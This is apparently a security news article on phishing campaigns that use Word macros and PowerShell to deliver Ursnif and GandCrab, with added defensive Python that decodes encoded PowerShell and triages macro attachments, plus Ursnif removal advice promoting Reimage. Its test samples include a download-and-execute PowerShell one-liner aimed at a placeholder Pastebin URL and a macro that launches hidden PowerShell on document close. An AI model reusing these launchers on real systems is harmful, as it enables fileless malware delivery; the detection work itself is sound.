New MS Word macro campaigns deliver GandCrab ransomware and the Ursnif trojan


Security researchers have discovered two separate malware campaigns: one distributes the Ursnif data-stealing trojan together with the GandCrab ransomware, whereas the second infects victims with Ursnif alone.

Though the two campaigns appear to be the work of separate cybercriminal groups, they share many similarities.

Both attacks start with a phishing email carrying a Microsoft Word attachment that contains malicious macros; the macros then use PowerShell to deliver the malware filelessly.

Ursnif is a data-stealing trojan that harvests banking credentials, browsing activity, keystrokes, and system and process information from compromised computers, and can deploy additional backdoors.

Discovered early last year, GandCrab is a widespread ransomware family that, like other ransomware, encrypts files on the infected system and demands a ransom in cryptocurrency to unlock them.

Its developers ask for payment primarily in DASH, which is harder to trace.

MS Docs + VBA macros = Ursnif and GandCrab infection

The first campaign, which distributes both threats, was discovered by security researchers at Carbon Black, who identified approximately 180 variants of MS Word documents in the wild carrying malicious VBA macros.

If the user enables macros, the malicious VBA code runs a PowerShell script, which then uses a series of techniques to download and execute both Ursnif and GandCrab on the targeted system.


The PowerShell script is base64-encoded and launches the next stage of the infection, which is responsible for downloading the main malware payloads.

The first payload is a PowerShell one-liner that checks whether the targeted system is 32- or 64-bit and accordingly downloads an additional payload from Pastebin. That payload is executed in memory rather than written to disk, which makes it harder for traditional file-based anti-virus scanning to detect.

“This PowerShell script is a version of the Empire Invoke-PSInject module, with very few modifications,” Carbon Black researchers said. “The script will take an embedded PE [Portable Executable] file that has been base64 encoded and inject that into the current PowerShell process.”

The final payload installs a variant of the GandCrab ransomware on the victim's system, locking them out of their files until they pay a ransom in cryptocurrency.

Meanwhile, the malware also downloads an Ursnif executable from a remote server; once executed, it fingerprints the system, monitors web browser traffic to collect data, and sends the data to the attackers' command and control (C&C) server.

“However, numerous Ursnif variants were hosted on the bevendbrec[.]com site during this campaign. Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth[.]com and bevendbrec[.]com,” the researchers said.

MS Docs + VBA macros = Ursnif data-stealing malware

Similarly, the second campaign, spotted by security researchers at Cisco Talos, uses a Microsoft Word document containing a malicious VBA macro to deliver another variant of the same Ursnif malware.


This attack also compromises targeted systems in multiple stages: a phishing email, malicious PowerShell commands that establish fileless persistence, and finally the download and installation of the Ursnif data-stealing trojan.

“There are three parts to the [PowerShell] command. The first part creates a function that is later used to decode base64 encoded PowerShell. The second part creates a byte array containing a malicious DLL,” Talos researchers explained.

“The third part executes the base64 decode function created in the first part, with a base64 encoded string as the parameter to the function. The returned decoded PowerShell is subsequently executed by the shorthand Invoke-Expression (iex) function.”

Once running on the victim's computer, the malware collects information about the system, packs it into a CAB archive, and sends it to its command-and-control server over an HTTPS connection.
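Both campaigns hand control from the Word macro to an encoded PowerShell command, so a useful defensive step is to decode what the macro actually launched and check it for the traits described above: a hidden, non-interactive launch, a nested FromBase64String stage (the Talos "three-part" command), an architecture check, a download from a paste site, in-memory execution through iex, and an embedded binary or injection routine. The script below is an added example, not Carbon Black's or Talos' code; the command lines, the paste URL and the indicator names are constructed placeholders rather than indicators from either report.

```python
"""
Decode the base64 layers of a PowerShell launcher taken from a process-creation
log and flag download-and-inject traits. Added example; all samples constructed.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?i)(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")
# A further stage handed to the .NET base64 decoder inside a script.
INLINE_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]\s*\)", re.I)

# Indicator names are this example's own labels; the patterns are generic PowerShell idioms.
INDICATORS = {
    "quiet_launch": re.compile(r"-w(?:indowstyle)?\s+hidden|-no(?:p|profile|ni|ninteractive)\b|-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "nested_base64": re.compile(r"frombase64string", re.I),
    "arch_check": re.compile(r"\[intptr\]::size|processor_architecture|is64bit", re.I),
    "web_download": re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "paste_site_stager": re.compile(r"pastebin\.com", re.I),
    "embedded_binary": re.compile(r"\[byte\[\]\]|(?:(?:0x[0-9a-f]{2}|\d{1,3})\s*,\s*){32,}", re.I),
    "reflective_inject": re.compile(r"invoke-psinject|invoke-reflectivepeinjection|virtualalloc|writeprocessmemory", re.I),
}


def _bytes_to_text(raw):
    """-EncodedCommand payloads are UTF-16LE; inline blobs are usually UTF-8."""
    if len(raw) >= 4 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def decode_layers(text, depth=0, max_depth=4):
    """Return `text` followed, depth-first, by every base64 stage nested inside it."""
    layers = [text]
    if depth >= max_depth:
        return layers
    blobs = [m.group(1) for m in ENC_FLAG.finditer(text)]
    blobs += [m.group(1) for m in INLINE_B64.finditer(text)]
    for blob in blobs:
        try:
            decoded = _bytes_to_text(base64.b64decode(blob, validate=True))
        except (ValueError, UnicodeDecodeError):
            continue  # not actually base64 (e.g. a long file name after -e)
        layers += decode_layers(decoded, depth + 1, max_depth)
    return layers


def score(command_line):
    """Map each indicator to the layer (0 = raw command line) where it first appears."""
    layers = decode_layers(command_line)
    hits = {}
    for depth, text in enumerate(layers):
        for name, pattern in INDICATORS.items():
            if name not in hits and pattern.search(text):
                hits[name] = depth
    return {"layers": layers, "hits": hits, "suspicious": len(hits) >= 3}


# Constructed samples (not real IOCs): the paste URL and the scripts are placeholders
# shaped like the chain described in the article.
STAGE2 = "iex (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLEID')"
STAGE1 = ("$a = if ([IntPtr]::Size -eq 8) {'x64'} else {'x86'}; "
          "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(STAGE2.encode()).decode() + "')))")
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(STAGE1.encode("utf-16-le")).decode()
BENIGN_CMDLINE = "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"

if __name__ == "__main__":
    for cmd in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        result = score(cmd)
        print("suspicious" if result["suspicious"] else "clean", result["hits"])
        for i, layer in enumerate(result["layers"][1:], 1):
            print(f"  layer {i}: {layer[:90]}")
```

Run it over the CommandLine field of Sysmon event ID 1 or Windows event 4688 exports. A single hit (an admin script started with -ExecutionPolicy Bypass, say) is normal; several hits spread across decoded layers is the shape of the delivery chain above and is worth pulling the parent Word process for.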

Talos has published a list of indicators of compromise (IOCs), including the names of the payload files dropped on compromised machines, in its blog post; these can help you detect and block Ursnif before it spreads through your network.

Remove Ursnif

Ursnif is a trojan horse used to steal sensitive data, among other things by recording users' keystrokes.

It is a data-stealing trojan that you need to remove before it empties your bank accounts as well.

The Ursnif virus is a dangerous trojan horse that has been used to steal users' private data. Once inside the system, it runs its code under the names of legitimate Windows processes such as svchost.exe and explorer.exe, which hides its presence on the system.

Additionally, this multifunctional malware starts numerous activities behind the victim's back, including the distribution of other malware.

However, its main activity is data theft.

Ursnif records the user's keystrokes and then sends the recorded information to its operators, which it can do over the Tor network.

In most cases, the malware arrives on the system via a malicious email attachment.

NAME: Ursnif virus
TYPE: Trojan horse
SYMPTOMS: Collects various user data by recording entered keystrokes
DISTRIBUTION: Spam email attachments
ELIMINATION: Use Reimage (or another anti-malware tool) for Ursnif virus removal

This trojan is designed to record sensitive information about the user, including banking data, logins and passwords, web browsing activity, and details of the victim's operating system and device.

All of this recorded information is shared with the malware's operators. The Ursnif keylogger can also delete itself from the system once it receives such a command.

Ursnif evolves constantly and has been active since 2007.

From the beginning it targeted financial institutions; more recently it has expanded to larger organizations and changed both its distribution techniques and the types of information it steals.

Ursnif is known to use techniques such as web injection, man-in-the-browser attacks and keylogging.

The latest attacks relied on spear-phishing emails, and the malware deleted copies of itself after the initial infection process. These facts make this banking trojan more dangerous and harder to detect or analyze.

This malware steals data about the user, the device and the user's accounts, such as:

  • information from your email accounts;
  • various information from your browsers;
  • logins and passwords of your social media accounts;
  • banking website logins and passwords.

Ursnif modifies various registry keys to keep its hold on the system. The people behind this threat focus on making money from background activities on your system or from stealing your banking credentials to take money directly out of your bank accounts.

While the infiltration of this trojan is hard to spot, you should note that its main way into the system is spam.

This trojan has been using clever tactics that rely on infected Word documents filled with malicious macros.

If you have recently been asked to enable macros to view the content of an email attachment, we highly recommend making sure that you are not infected.

The easiest way to do that is to scan the system with an updated anti-malware tool.

If you have any doubts about whether this malware is on your device, check your system with updated anti-malware software and perform Ursnif removal to protect your personal information.

To get rid of it, use Reimage or any other anti-malware/anti-virus software.

We do not recommend performing the removal manually, as this is a dangerous cyber threat that can involve numerous different components hidden on your computer.

If you are blocked, reboot your PC into Safe Mode with Networking first to disable the malware.

In most cases, antivirus programs detect the Ursnif trojan horse under names such as:

  • TR/Crypt.XPACK.Gen
  • Virus/Win32.PolyRansom.c
  • HEUR/Fakon.mwf
  • Win32.Doboc.Gen.1
  • Troj.Heur.LP.mE18
  • etc

Malware activity may lead to serious privacy issues or financial loss, so you need to remove Ursnif as soon as possible.

This type of intruder can download and install other malware, including ransomware, which could lead to data loss. There is no need to keep yourself at such risk.

However, we should say once more that you shouldn't try to delete the trojan manually, as you can cause your system serious trouble by removing needed system components.

Ursnif is keystroke-collecting malware that reaches your system via infected spam emails.

Spam email campaigns have been spreading this malware as seemingly legitimate attachments that ask you to enable macros.

Researchers have always warned people that they shouldn't believe anything on the internet that looks too good to be true.

That includes banner ads, in-text links, and spam emails as well.

Spam has also been a commonly used technique for trojan distribution. However, when discussing the Ursnif trojan, note that it relies on a slightly different distribution method.

Its developers deliver the threat mainly through Word documents filled with malicious macros.

Once downloaded, such an attachment asks you to enable macros, and in this way launches the malware.

Other distinctive features of the distribution technique used by this banking trojan:

  • Compromised email accounts are used to reply to existing email threads, so the content of the email looks convincing;
  • The malicious payload is released when the user downloads the macro-filled document. However, the trojan waits until the attachment is closed to launch the process;
  • The harmless-looking Word attachment also executes PowerShell code. After this, the malware connects to a URL and delivers the payload directly onto the system;
  • The whole campaign relies on emails being sent from familiar senders, which increases the chances of people opening the infected file;
  • The most common pattern used to name these files is "the name of a local business or service_Statement".
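The lure depends on the user enabling macros, and the list above notes that the code only runs when the document is closed. Below is an added example (not the researchers' tooling) of how to triage such an attachment without opening it in Word: check whether the OOXML package carries a VBA project at all, decompress the macro source with the MS-OVBA algorithm, and look for auto-execute procedures such as Document_Close next to shell or PowerShell calls. The sample document and macro are constructed here, and the vbaProject part holds one compressed stream directly; a real vbaProject.bin is an OLE compound file whose module streams first have to be located with an OLE parser, which this example leaves out.

```python
"""
Triage a Word attachment for macros before anyone clicks "Enable Content".
Added example; the package and macro below are constructed. The decompressor
follows MS-OVBA section 2.4.1 (signature byte, then 4 KiB chunks of tokens).
"""
import io
import re
import zipfile

VBA_PART = "word/vbaProject.bin"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
# Procedures Word runs without a click, and calls that hand control to the OS.
AUTO_EXEC = re.compile(r"\b(?:Auto(?:Open|Close|Exec|New)|Document_(?:Open|Close|New))\b", re.I)
SUSPICIOUS = re.compile(r"\b(?:Shell|CreateObject|WScript\.Shell|powershell|cmd(?:\.exe)?|Chr\(|Environ\()", re.I)


def has_vba_project(package):
    """True if the OOXML zip ships a VBA project, whatever the file extension says."""
    try:
        with zipfile.ZipFile(io.BytesIO(package)) as z:
            names = set(z.namelist())
            ctypes = z.read("[Content_Types].xml").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError):
        return False
    return VBA_PART in names or VBA_CONTENT_TYPE in ctypes


def decompress_vba(stream):
    """MS-OVBA 2.4.1 decompression of one module stream."""
    if not stream or stream[0] != 0x01:
        raise ValueError("not a compressed VBA container")
    out, pos = bytearray(), 1
    while pos + 2 <= len(stream):
        header = int.from_bytes(stream[pos:pos + 2], "little")
        if ((header >> 12) & 0x7) != 0b011:
            raise ValueError("bad chunk signature")
        chunk_end = min(len(stream), pos + (header & 0x0FFF) + 3)
        is_compressed = header >> 15
        pos += 2
        chunk_start = len(out)
        if not is_compressed:            # raw chunk: 4096 literal bytes
            out += stream[pos:chunk_end]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags = stream[pos]
            pos += 1
            for bit in range(8):         # one flag bit per token, LSB first
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(stream[pos])
                    pos += 1
                    continue
                token = int.from_bytes(stream[pos:pos + 2], "little")
                pos += 2
                # The offset/length split widens as the chunk fills (CopyToken Help).
                bit_count = max(4, (len(out) - chunk_start - 1).bit_length())
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                for _ in range(length):  # byte-wise so overlapping copies work
                    out.append(out[-offset])
    return bytes(out)


def compress_vba_literal(data):
    """Spec-valid container using only literal tokens; enough to build a sample."""
    if len(data) > 3640:
        raise ValueError("all-literal encoding overflows one chunk; use raw chunks")
    body = bytearray()
    for i in range(0, len(data), 8):
        body += b"\x00" + data[i:i + 8]  # flag 0x00 = next eight bytes are literals
    header = 0x8000 | 0x3000 | (len(body) + 2 - 3)
    return b"\x01" + header.to_bytes(2, "little") + bytes(body)


def triage_vba_source(source):
    triggers = sorted({m.group(0) for m in AUTO_EXEC.finditer(source)})
    calls = sorted({m.group(0) for m in SUSPICIOUS.finditer(source)})
    verdict = "malicious-looking" if triggers and calls else ("review" if calls else "benign-looking")
    return {"auto_exec": triggers, "suspicious_calls": calls, "verdict": verdict}


def triage_attachment(package):
    if not has_vba_project(package):
        return {"verdict": "no macros"}
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        source = decompress_vba(z.read(VBA_PART)).decode("latin-1")
    return triage_vba_source(source)


# Constructed sample macro: fires when the document is closed and launches PowerShell.
# The base64 argument is a placeholder, not a real payload.
SAMPLE_VBA = (
    'Attribute VB_Name = "ThisDocument"\r\n'
    "Private Sub Document_Close()\r\n"
    "    Dim s As String\r\n"
    '    s = "powershell -w hidden -nop -enc " & Chr(85) & "GxhY2Vob2xkZXI="\r\n'
    '    CreateObject("WScript.Shell").Run s, 0\r\n'
    "End Sub\r\n"
).encode("latin-1")


def build_sample_package(vba_source=None):
    """Minimal OOXML zip; with vba_source it mimics a .docm, without it a plain .docx."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        default = f'<Default Extension="bin" ContentType="{VBA_CONTENT_TYPE}"/>' if vba_source else ""
        z.writestr("[Content_Types].xml", f"<Types>{default}</Types>")
        z.writestr("word/document.xml", "<w:document/>")
        if vba_source:
            z.writestr(VBA_PART, compress_vba_literal(vba_source))
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_attachment(build_sample_package(SAMPLE_VBA)))
    print(triage_attachment(build_sample_package()))
```

The string scan is deliberately simple: real lures obfuscate procedure bodies with Chr() and string concatenation, which is exactly why Chr( and CreateObject are treated as signals in their own right. The auto-execute names are the ones Word honours for documents; Excel adds Workbook_Open and Auto_Open.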

You can avoid these intruders by deleting spam emails that are not from companies you know or services you use. Clean suspicious emails out of your mailbox regularly and scan files before downloading them to your device. Pay attention to these steps and do not open an email you were not expecting.

Best ways to remove Ursnif virus

When dealing with any silent intruder, anti-malware tools are the best option for removal. Trojans are among the most dangerous infections because they can additionally install other malware on the system.

To remove the Ursnif trojan and all related programs from the system, run a full system scan with an updated anti-malware tool. If you are blocked, check the two methods given below, which are supposed to help you disable the malware before a scan.

The tools we recommend for Ursnif removal are Reimage, Malwarebytes or Plumbytes Anti-Malware. Update them to their latest versions and run a full system scan to check your device thoroughly and get rid of any malware hiding on your system.

You can also use the anti-virus software of your choice, just make sure that it is a reputable and well-known tool. 

